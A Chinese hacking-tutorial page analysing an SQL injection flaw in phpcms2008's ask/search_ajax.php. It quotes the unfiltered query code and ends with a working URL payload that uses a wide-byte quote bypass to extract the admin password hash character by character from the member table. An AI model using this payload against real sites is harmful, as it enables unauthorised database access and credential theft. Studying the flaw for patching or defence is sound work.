phpcms2008 注入漏洞 利用分析_黑客入侵教程-查字典教程网
phpcms2008 注入漏洞 利用分析
phpcms2008 注入漏洞 利用分析
发布时间:2016-12-21 来源:查字典编辑
摘要:这个是最新有人发现的该漏洞文件:ask/search_ajax.php漏洞说明:/ask/search_ajax.phpCode:if($q...

这个是最新有人发现的

该漏洞文件:ask/search_ajax.php

漏洞说明:

/ask/search_ajax.php

Code:

if($q)

{

$where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where

}

else

{

exit('null');

}

$infos = $ask->listinfo($where, 'askid DESC', '', 10);

/ask/include/answer.class.php

Code:

function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)

{

if($where) $where = " WHERE $where";

if($order) $order = " ORDER BY $order";

$page = max(intval($page), 1);

$offset = $pagesize*($page-1);

$limit = " LIMIT $offset, $pagesize";

$r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");

$number = $r['number'];

$this->pages = pages($number, $page, $pagesize);

$array = array();

$i = 1;

$result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");

while($r = $this->db->fetch_array($result))

{

$r['orderid'] = $i;

$array[] = $r;

$i++;

}

$this->number = $this->db->num_rows($result);

$this->db->free_result($result);

return $array;

}

测试方法:

复制代码代码如下:

/ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新黑客入侵学习
    热门黑客入侵学习
    网络安全子分类